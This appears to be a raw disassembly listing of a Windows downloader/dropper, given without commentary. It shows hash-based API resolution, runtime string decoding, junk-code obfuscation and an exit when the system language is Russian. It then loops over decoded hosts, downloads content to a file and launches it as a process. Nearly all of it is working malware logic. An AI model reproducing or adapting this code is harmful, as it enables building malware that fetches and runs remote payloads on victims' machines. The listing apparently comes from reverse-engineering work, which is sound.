loc_401BB9: ; CODE XREF: sub_401A08+1AD�j
add eax, 13h
add ecx, 13h
cmp eax, 0C4h
jl short loc_401BAF
mov dword_405104, eax
mov [ebp+var_8], 1
loc_401BD2: ; CODE XREF: sub_401A08+157�j
cmp eax, 0Fh
jl short loc_401BDD
inc eax
mov dword_405104, eax
loc_401BDD: ; CODE XREF: sub_401A08+1CD�j
cmp eax, 0AFh
jle short loc_401BEE
mov dword_405104, 18h
loc_401BEE: ; CODE XREF: sub_401A08+1DA�j
push 8593DD7h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_87C]
push ecx
call eax
cmp dword_405104, 0Bh
mov [ebp+var_10], eax
jl short loc_401C1A
inc dword_405104
loc_401C1A: ; CODE XREF: sub_401A08+20A�j
cmp dword_405104, 0B5h
jle short loc_401C30
mov dword_405104, 23h
loc_401C30: ; CODE XREF: sub_401A08+21C�j
push 0B87DBD66h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_10]
call eax
mov esi, 1AD09C78h
push esi
push edi
mov [ebp+var_C], eax
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_1C]
push ecx
push 2
push [ebp+var_10]
call eax
cmp dword_405104, 0Fh
jl short loc_401C79
inc dword_405104
loc_401C79: ; CODE XREF: sub_401A08+269�j
cmp dword_405104, 9Eh
jle short loc_401C8F
mov dword_405104, 1Ah
loc_401C8F: ; CODE XREF: sub_401A08+27B�j
push esi
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_1C]
push ecx
push 6
push [ebp+var_10]
call eax
push esi
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_1C]
push ecx
push 5
push [ebp+var_10]
call eax
push 2F5CE027h
push edi
mov [ebp+var_18], ebx
mov [ebp+var_4], edi
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_18]
push ecx
push 20000005h
push [ebp+var_C]
call eax
cmp dword_405104, 0Fh
jl short loc_401CEE
inc dword_405104
loc_401CEE: ; CODE XREF: sub_401A08+2DE�j
cmp dword_405104, 0B6h
jle short loc_401D04
mov dword_405104, 27h
loc_401D04: ; CODE XREF: sub_401A08+2F0�j
mov eax, [ebp+var_18]
lea ecx, [eax-401h]
cmp ecx, 48FDEh
ja loc_401EFA
push 8F8F114h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push edi
push ebx
push 2
push 40000000h
push [ebp+arg_4]
call eax
mov esi, dword_405104
mov [ebp+var_24], eax
lea eax, [esi-5Eh]
cmp eax, 72h
ja short loc_401D53
inc esi
mov dword_405104, esi
loc_401D53: ; CODE XREF: sub_401A08+342�j
cmp esi, 0Dh
mov [ebp+var_4], ebx
jl short loc_401D62
inc esi
mov dword_405104, esi
loc_401D62: ; CODE XREF: sub_401A08+351�j
cmp esi, 9Ch
jle short loc_401D73
push 1Ah
pop esi
mov dword_405104, esi
loc_401D73: ; CODE XREF: sub_401A08+360�j
push 400h
lea eax, [ebp+var_47C]
push ebx
push eax
call sub_4010BB
add esp, 0Ch
cmp esi, 5
mov [ebp+var_14], 400h
jl short loc_401D9B
inc esi
mov dword_405104, esi
loc_401D9B: ; CODE XREF: sub_401A08+38A�j
cmp esi, 0A7h
jle short loc_401DAD
mov dword_405104, 1Eh
loc_401DAD: ; CODE XREF: sub_401A08+399�j
push 1A212962h
push edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 400h
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_C]
call eax
mov ecx, dword_405104
test eax, eax
setnz al
add ecx, 0FFFFFFEDh
cmp ecx, 0D0h
ja short loc_401DEB
inc dword_405104
loc_401DEB: ; CODE XREF: sub_401A08+3DB�j
cmp [ebp+var_4], ebx
jbe loc_401EC0
mov esi, 400h
loc_401DF9: ; CODE XREF: sub_401A08+4B2�j
cmp al, bl
jz loc_401EC0
mov eax, dword_405104
add eax, 0FFFFFFDAh
cmp eax, 0A3h
ja short loc_401E16
inc dword_405104
loc_401E16: ; CODE XREF: sub_401A08+406�j
mov eax, [ebp+var_4]
push 0F3FD1C3h
push 1
mov [ebp+var_20], eax
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_28]
push ecx
push [ebp+var_20]
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_24]
call eax
push 3Ah
pop eax
push 30h
pop ecx
loc_401E44: ; CODE XREF: sub_401A08+451�j
cmp ecx, 0D4h
ja short loc_401E4E
inc eax
inc ecx
loc_401E4E: ; CODE XREF: sub_401A08+442�j
add eax, 2Eh
add ecx, 2Eh
cmp eax, 9Dh
jl short loc_401E44
push esi
lea eax, [ebp+var_47C]
push ebx
push eax
call sub_4010BB
add esp, 0Ch
push 3Eh
pop eax
push 0FFFFFFE8h
mov [ebp+var_14], esi
mov [ebp+var_4], ebx
pop ecx
loc_401E78: ; CODE XREF: sub_401A08+485�j
cmp ecx, 91h
ja short loc_401E82
inc eax
inc ecx
loc_401E82: ; CODE XREF: sub_401A08+476�j
add eax, 24h
add ecx, 24h
cmp eax, 80h
jl short loc_401E78
push 1A212962h
push edi
mov dword_405104, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_C]
call eax
test eax, eax
setnz al
cmp [ebp+var_4], ebx
ja loc_401DF9
loc_401EC0: ; CODE XREF: sub_401A08+3E6�j
; sub_401A08+3F3�j
cmp dword_405104, 2
jl short loc_401ECF
inc dword_405104
loc_401ECF: ; CODE XREF: sub_401A08+4BF�j
cmp dword_405104, 9Ah
jle short loc_401EE5
mov dword_405104, 15h
loc_401EE5: ; CODE XREF: sub_401A08+4D1�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_24]
call eax
jmp short loc_401F07
; ---------------------------------------------------------------------------
loc_401EFA: ; CODE XREF: sub_401A08+30B�j
add eax, 0FFFFFFFEh
cmp eax, 3FEh
ja short loc_401F07
mov [ebp+arg_8], bl
loc_401F07: ; CODE XREF: sub_401A08+4F0�j
; sub_401A08+4FA�j
mov esi, 1A212962h
jmp short loc_401F12
; ---------------------------------------------------------------------------
loc_401F0E: ; CODE XREF: sub_401A08+530�j
cmp al, bl
jz short loc_401F3A
loc_401F12: ; CODE XREF: sub_401A08+504�j
push esi
push edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 400h
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_C]
call eax
test eax, eax
setnz al
cmp [ebp+var_4], ebx
ja short loc_401F0E
loc_401F3A: ; CODE XREF: sub_401A08+508�j
mov esi, 7314FB0Ch
push esi
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_C]
call eax
push esi
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_10]
call eax
push 8F8F114h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push 3
push ebx
push 1
push 80000000h
push [ebp+arg_4]
call eax
cmp dword_405104, 20h
mov esi, eax
jge short loc_401F8F
inc dword_405104
loc_401F8F: ; CODE XREF: sub_401A08+57F�j
push 0AEF7CBF1h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push esi
call eax
cmp dword_405104, 11h
mov [ebp+var_20], eax
jl short loc_401FB3
inc dword_405104
loc_401FB3: ; CODE XREF: sub_401A08+5A3�j
cmp dword_405104, 0DEh
jle short loc_401FC9
mov dword_405104, 16h
loc_401FC9: ; CODE XREF: sub_401A08+5B5�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push esi
call eax
mov esi, dword_405104
inc [ebp+var_8]
cmp esi, ebx
jl short loc_401FEE
inc esi
mov dword_405104, esi
loc_401FEE: ; CODE XREF: sub_401A08+5DD�j
cmp esi, 0ADh
jle short loc_401FFF
push 17h
pop esi
mov dword_405104, esi
loc_401FFF: ; CODE XREF: sub_401A08+5EC�j
mov ecx, [ebp+var_18]
cmp ecx, [ebp+var_20]
jz short loc_402016
cmp [ebp+var_8], 2
jge short loc_402016
cmp [ebp+arg_8], bl
jnz loc_401AD0
loc_402016: ; CODE XREF: sub_401A08+5FD�j
; sub_401A08+603�j
push 3Eh
pop esi
xor eax, eax
loc_40201B: ; CODE XREF: sub_401A08+628�j
cmp eax, 0B8h
ja short loc_402024
inc esi
inc eax
loc_402024: ; CODE XREF: sub_401A08+618�j
add esi, 28h
add eax, 28h
cmp esi, 84h
jl short loc_40201B
lea eax, [ecx-2]
cmp eax, 3FEh
mov dword_405104, esi
ja short loc_402049
xor eax, eax
jmp loc_4020DD
; ---------------------------------------------------------------------------
loc_402049: ; CODE XREF: sub_401A08+638�j
cmp [ebp+arg_8], bl
jz loc_4020DA
add ecx, 0FFFFFBFFh
cmp ecx, 48FDEh
ja short loc_4020DA
lea eax, [esi-53h]
cmp eax, 99h
ja short loc_402071
inc esi
mov dword_405104, esi
loc_402071: ; CODE XREF: sub_401A08+660�j
push 40h
lea eax, [ebp+var_78]
push ebx
push eax
mov [ebp+var_7C], 44h
call sub_4010BB
add esp, 0Ch
cmp esi, 80h
jge short loc_402096
inc esi
mov dword_405104, esi
loc_402096: ; CODE XREF: sub_401A08+685�j
push 46318AC7h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_7C]
push ecx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_4]
push ebx
call eax
cmp dword_405104, 0ECh
jge short loc_4020CA
inc dword_405104
loc_4020CA: ; CODE XREF: sub_401A08+6BA�j
cmp [ebp+var_8], 1
jnz short loc_4020D5
xor eax, eax
inc eax
jmp short loc_4020DD
; ---------------------------------------------------------------------------
loc_4020D5: ; CODE XREF: sub_401A08+6C6�j
push 2
pop eax
jmp short loc_4020DD
; ---------------------------------------------------------------------------
loc_4020DA: ; CODE XREF: sub_401A08+644�j
; sub_401A08+656�j
or eax, 0FFFFFFFFh
loc_4020DD: ; CODE XREF: sub_401A08+63C�j
; sub_401A08+6CB�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401A08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_4020E2 proc near ; CODE XREF: UPX0:loc_403663�p
; DATA XREF: sub_40301C+1B2�o
var_2B4 = byte ptr -2B4h
var_1B4 = byte ptr -1B4h
var_B4 = byte ptr -0B4h
var_A4 = byte ptr -0A4h
var_94 = byte ptr -94h
var_84 = byte ptr -84h
var_74 = byte ptr -74h
var_64 = byte ptr -64h
var_54 = byte ptr -54h
var_44 = byte ptr -44h
var_34 = byte ptr -34h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 2B4h
push ebx
push esi
push edi
push 0Bh
mov esi, offset dword_405208
push esi
push (offset loc_404033+1)
call sub_40102E
mov edi, 0C8AC8026h
xor ebx, ebx
push edi
inc ebx
push ebx
call sub_401117
add esp, 14h
push esi
call eax
push 18h
pop eax
push 0FFFFFFE8h
pop ecx
loc_40211D: ; CODE XREF: sub_4020E2+50�j
cmp ecx, 0ADh
ja short loc_402127
inc eax
inc ecx
loc_402127: ; CODE XREF: sub_4020E2+41�j
add eax, 15h
add ecx, 15h
cmp eax, 0B1h
jl short loc_40211D
push 0Ah
push esi
push offset dword_4041FC
mov dword_405104, eax
call sub_40102E
push edi
push ebx
call sub_401117
add esp, 14h
push esi
call eax
push 0Ch
push esi
push offset dword_4041EC
call sub_40102E
push edi
push ebx
call sub_401117
add esp, 14h
push esi
call eax
mov eax, dword_405104
cmp eax, ebx
jl short loc_40217C
inc eax
mov dword_405104, eax
loc_40217C: ; CODE XREF: sub_4020E2+92�j
cmp eax, 0F7h
jle short loc_40218B
push 23h
pop eax
mov dword_405104, eax
loc_40218B: ; CODE XREF: sub_4020E2+9F�j
cmp eax, 0Eh
mov byte ptr [ebp+78h+var_8], 1
jl short loc_40219A
inc eax
mov dword_405104, eax
loc_40219A: ; CODE XREF: sub_4020E2+B0�j
cmp eax, 99h
jle short loc_4021A9
push 1Dh
pop eax
mov dword_405104, eax
loc_4021A9: ; CODE XREF: sub_4020E2+BD�j
lea ecx, [eax-2Ch]
cmp ecx, 0B9h
ja short loc_4021BA
inc eax
mov dword_405104, eax
loc_4021BA: ; CODE XREF: sub_4020E2+D0�j
xor edi, edi
cmp eax, 39h
mov [ebp+78h+var_24], edi
jge short loc_4021CA
inc eax
mov dword_405104, eax
loc_4021CA: ; CODE XREF: sub_4020E2+E0�j
lea ecx, [eax-57h]
cmp ecx, 70h
ja short loc_4021D8
inc eax
mov dword_405104, eax
loc_4021D8: ; CODE XREF: sub_4020E2+EE�j
cmp eax, 56h
jge short loc_4021E3
inc eax
mov dword_405104, eax
loc_4021E3: ; CODE XREF: sub_4020E2+F9�j
cmp eax, 0B7h
jge short loc_4021F0
inc eax
mov dword_405104, eax
loc_4021F0: ; CODE XREF: sub_4020E2+106�j
push 7A813811h
push ebx
call sub_401117
pop ecx
pop ecx
call eax
push 3
movzx eax, ax
push esi
push offset dword_4041E8
mov [ebp+78h+var_4], eax
call sub_40102E
push 67ECDE97h
push ebx
call sub_401117
add esp, 14h
push edi
push edi
push edi
push edi
lea ecx, [ebp+78h+var_24]
push ecx
push edi
push edi
push esi
call eax
cmp dword_405104, 20h
jge short loc_40223C
inc dword_405104
loc_40223C: ; CODE XREF: sub_4020E2+152�j
push 2
push esi
push offset dword_4041E4
call sub_40102E
push [ebp+78h+var_24]
lea eax, [ebp+78h+var_44]
push esi
push eax
call dword_404014 ; wsprintfA
mov eax, dword_405104
lea ecx, [eax-41h]
add esp, 18h
cmp ecx, 0A3h
ja short loc_402270
inc eax
mov dword_405104, eax
loc_402270: ; CODE XREF: sub_4020E2+186�j
cmp eax, 3
jl short loc_40227B
inc eax
mov dword_405104, eax
loc_40227B: ; CODE XREF: sub_4020E2+191�j
cmp eax, 0F7h
jle short loc_40228C
mov dword_405104, 1Eh
loc_40228C: ; CODE XREF: sub_4020E2+19E�j
push 0Dh
push esi
push offset byte_4041D4
call sub_40102E
mov edi, dword_404000
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_B4]
push eax
call edi ; lstrcpy
push 0Bh
push esi
push offset byte_4041C8
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_A4]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset byte_4041BC
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_94]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset byte_4041AC
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_84]
push eax
call edi ; lstrcpy
push 9
push esi
push offset byte_4041A0
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_74]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset byte_404190
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_64]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset byte_404180
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_54]
push eax
call edi ; lstrcpy
cmp dword_405104, 0C2h
jge short loc_402345
inc dword_405104
loc_402345: ; CODE XREF: sub_4020E2+25B�j
push 25h
push esi
push offset dword_404158
call sub_40102E
add esp, 0Ch
push esi
push offset dword_405108
call edi ; lstrcpy
push 25h
push esi
push offset dword_404130
call sub_40102E
add esp, 0Ch
push esi
push offset dword_405308
call edi ; lstrcpy
cmp word ptr [ebp+78h+var_4], 419h
jz loc_4029FE
call sub_401094
test eax, eax
jnz loc_4029FE
push 3Ah
pop eax
push 1Ah
pop ecx
loc_402394: ; CODE XREF: sub_4020E2+2C5�j
cmp ecx, 0B7h
ja short loc_40239E
inc eax
inc ecx
loc_40239E: ; CODE XREF: sub_4020E2+2B8�j
add eax, 1Bh
add ecx, 1Bh
cmp eax, 7Ch
jl short loc_402394
push 3
push esi
push offset dword_40412C
mov dword_405104, eax
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
mov ebx, dword_40400C
lea eax, [ebp+78h+var_44]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 19h
push esi
push (offset loc_40410F+1)
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push 1
push 0
lea eax, [ebp+78h+var_1B4]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401A08
add esp, 10h
cmp word ptr [ebp+78h+var_4], 410h
jnz loc_4024C5
mov eax, dword_405104
add eax, 0FFFFFFC9h
cmp eax, 0ADh
ja short loc_402430
inc dword_405104
loc_402430: ; CODE XREF: sub_4020E2+346�j
push 2
push esi
push offset loc_40410C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_A4]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 7
push esi
push (offset loc_404103+1)
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push 1
push 1
lea eax, [ebp+78h+var_1B4]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401A08
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_402497
mov byte ptr [ebp+78h+var_8], 0
loc_402497: ; CODE XREF: sub_4020E2+3AF�j
cmp dword_405104, 2
jl short loc_4024A6
inc dword_405104
loc_4024A6: ; CODE XREF: sub_4020E2+3BC�j
cmp dword_405104, 0D5h
jle loc_4026ED
mov dword_405104, 1Dh
jmp loc_4026ED
; ---------------------------------------------------------------------------
loc_4024C5: ; CODE XREF: sub_4020E2+333�j
cmp dword_405104, 0CEh
jge short loc_4024D7
inc dword_405104
loc_4024D7: ; CODE XREF: sub_4020E2+3ED�j
push 2
push esi
push offset loc_40410C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_B4]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 0Ah
push esi
push offset byte_4040F8
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push 1
push 1
lea eax, [ebp+78h+var_1B4]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401A08
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_40253E
mov byte ptr [ebp+78h+var_8], 0
loc_40253E: ; CODE XREF: sub_4020E2+456�j
push 2
push esi
push offset loc_40410C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_74]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 0Bh
push esi
push offset dword_4040EC
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401A08
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_4025A6
mov byte ptr [ebp+78h+var_8], 0
loc_4025A6: ; CODE XREF: sub_4020E2+4BE�j
push 2
push esi
push offset loc_40410C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_64]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 0Dh
push esi
push offset dword_4040DC
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401A08
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_40260E
mov byte ptr [ebp+78h+var_8], 0
loc_40260E: ; CODE XREF: sub_4020E2+526�j
push 2
push esi
push offset loc_40410C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_94]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 0Dh
push esi
push offset dword_4040CC
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401A08
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_402676
mov byte ptr [ebp+78h+var_8], 0
loc_402676: ; CODE XREF: sub_4020E2+58E�j
push 2
push esi
push offset loc_40410C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_84]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 0Ch
push esi
push (offset loc_4040BB+1)
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401A08
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_4026DE
mov byte ptr [ebp+78h+var_8], 0
loc_4026DE: ; CODE XREF: sub_4020E2+5F6�j
cmp dword_405104, 6Bh
jge short loc_4026ED
inc dword_405104
loc_4026ED: ; CODE XREF: sub_4020E2+3CE�j
; sub_4020E2+3DE�j ...
push 2
push esi
push offset loc_40410C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_54]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 6
push esi
push offset loc_4040B4
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401A08
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_402755
mov byte ptr [ebp+78h+var_8], 0
loc_402755: ; CODE XREF: sub_4020E2+66D�j
mov eax, dword_405104
add eax, 0FFFFFFE4h
cmp eax, 0C6h
ja short loc_40276A
inc dword_405104
loc_40276A: ; CODE XREF: sub_4020E2+680�j
cmp [ebp+78h+var_4], 0
jle loc_4029FE
cmp dword_405104, 0E9h
jge short loc_402786
inc dword_405104
loc_402786: ; CODE XREF: sub_4020E2+69C�j
push 3
push esi
push offset dword_40412C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_44]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
cmp dword_405104, 0D8h
jge short loc_4027BF
inc dword_405104
loc_4027BF: ; CODE XREF: sub_4020E2+6D5�j
push 1Fh
push esi
push offset dword_404094
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+78h+var_34]
push ecx
call eax
cmp dword_405104, 7
jl short loc_4027FC
inc dword_405104
loc_4027FC: ; CODE XREF: sub_4020E2+712�j
cmp dword_405104, 0ECh
jle short loc_402812
mov dword_405104, 19h
loc_402812: ; CODE XREF: sub_4020E2+724�j
push 2
push esi
mov edi, offset dword_404090
push edi
call sub_40102E
movzx eax, [ebp+78h+var_2C]
push eax
lea eax, [ebp+78h+var_10]
push esi
push eax
call dword_404014 ; wsprintfA
mov al, [ebp+78h+var_10]
add al, 1Dh
add esp, 18h
cmp dword_405104, 10h
mov [ebp+78h+var_17], al
jge short loc_40284A
inc dword_405104
loc_40284A: ; CODE XREF: sub_4020E2+760�j
mov al, [ebp+78h+var_F]
test al, al
jnz short loc_402857
mov [ebp+78h+var_15], 30h
jmp short loc_40285C
; ---------------------------------------------------------------------------
loc_402857: ; CODE XREF: sub_4020E2+76D�j
add al, 13h
mov [ebp+78h+var_15], al
loc_40285C: ; CODE XREF: sub_4020E2+773�j
push 2
push esi
push edi
call sub_40102E
movzx eax, [ebp+78h+var_2A]
push eax
lea eax, [ebp+78h+var_C]
push esi
push eax
call dword_404014 ; wsprintfA
mov al, [ebp+78h+var_C]
add al, 17h
mov [ebp+78h+var_18], al
mov al, [ebp+78h+var_B]
add esp, 18h
test al, al
jnz short loc_40288D
mov [ebp+78h+var_16], 30h
jmp short loc_402892
; ---------------------------------------------------------------------------
loc_40288D: ; CODE XREF: sub_4020E2+7A3�j
add al, 19h
mov [ebp+78h+var_16], al
loc_402892: ; CODE XREF: sub_4020E2+7A9�j
lea eax, [ebp+78h+var_18]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
mov [ebp+78h+var_14], 0
call ebx ; lstrcat
push 7
push esi
push offset dword_404088
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call ebx ; lstrcat
cmp dword_405104, 11h
jl short loc_4028CC
inc dword_405104
loc_4028CC: ; CODE XREF: sub_4020E2+7E2�j
cmp dword_405104, 0E4h
jle short loc_4028E2
mov dword_405104, 21h
loc_4028E2: ; CODE XREF: sub_4020E2+7F4�j
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+78h+var_34]
push ecx
call eax
push 2
push esi
push edi
call sub_40102E
movzx eax, [ebp+78h+var_2C]
push eax
lea eax, [ebp+78h+var_10]
push esi
push eax
call dword_404014 ; wsprintfA
mov al, [ebp+78h+var_10]
add esp, 18h
push 60h
mov [ebp+78h+var_1F], al
pop eax
push 0Ch
pop ecx
loc_40291E: ; CODE XREF: sub_4020E2+84F�j
cmp ecx, 8Fh
ja short loc_402928
inc eax
inc ecx
loc_402928: ; CODE XREF: sub_4020E2+842�j
add eax, 16h
add ecx, 16h
cmp eax, 72h
jl short loc_40291E
mov dword_405104, eax
mov al, [ebp+78h+var_F]
test al, al
mov [ebp+78h+var_1E], 30h
jz short loc_402946
mov [ebp+78h+var_1E], al
loc_402946: ; CODE XREF: sub_4020E2+85F�j
push 2
push esi
push edi
call sub_40102E
movzx eax, [ebp+78h+var_2A]
push eax
lea eax, [ebp+78h+var_C]
push esi
push eax
call dword_404014 ; wsprintfA
mov al, [ebp+78h+var_C]
mov [ebp+78h+var_1D], al
mov al, [ebp+78h+var_B]
add esp, 18h
test al, al
mov [ebp+78h+var_20], 30h
jz short loc_402976
mov [ebp+78h+var_20], al
loc_402976: ; CODE XREF: sub_4020E2+88F�j
push 40h
pop eax
push 3Ah
pop ecx
loc_40297C: ; CODE XREF: sub_4020E2+8AF�j
cmp ecx, 0D1h
ja short loc_402986
inc eax
inc ecx
loc_402986: ; CODE XREF: sub_4020E2+8A0�j
add eax, 31h
add ecx, 31h
cmp eax, 0AEh
jl short loc_40297C
mov dword_405104, eax
lea eax, [ebp+78h+var_20]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
mov [ebp+78h+var_1C], 0
call ebx ; lstrcat
push 4
push esi
push offset dword_404080
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call ebx ; lstrcat
lea eax, [ebp+78h+var_44]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call ebx ; lstrcat
mov eax, dword_405104
add eax, 0FFFFFF9Eh
cmp eax, 6Ah
ja short loc_4029E3
inc dword_405104
loc_4029E3: ; CODE XREF: sub_4020E2+8F9�j
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 0
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401A08
add esp, 10h
loc_4029FE: ; CODE XREF: sub_4020E2+299�j
; sub_4020E2+2A6�j ...
push 95902B19h
push 1
call sub_401117
pop ecx
pop ecx
push 0
call eax
pop edi
pop esi
pop ebx
add ebp, 78h
leave
retn
sub_4020E2 endp
; =============== S U B R O U T I N E =======================================
sub_402A18 proc near ; DATA XREF: sub_40301C+9E�o
cmp dword_405104, 6Dh
jge short loc_402A27
inc dword_405104
loc_402A27: ; CODE XREF: sub_402A18+7�j
push esi
push edi
mov edi, 81F0F0DFh
push edi
push 1
call sub_401117
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
jmp short loc_402A6F
; ---------------------------------------------------------------------------
loc_402A3D: ; CODE XREF: sub_402A18+5E�j
push 1297812Ch
push 1
call sub_401117
pop ecx
pop ecx
call eax
cmp eax, 2
jz short loc_402A78
push 3D9972F5h
push 1
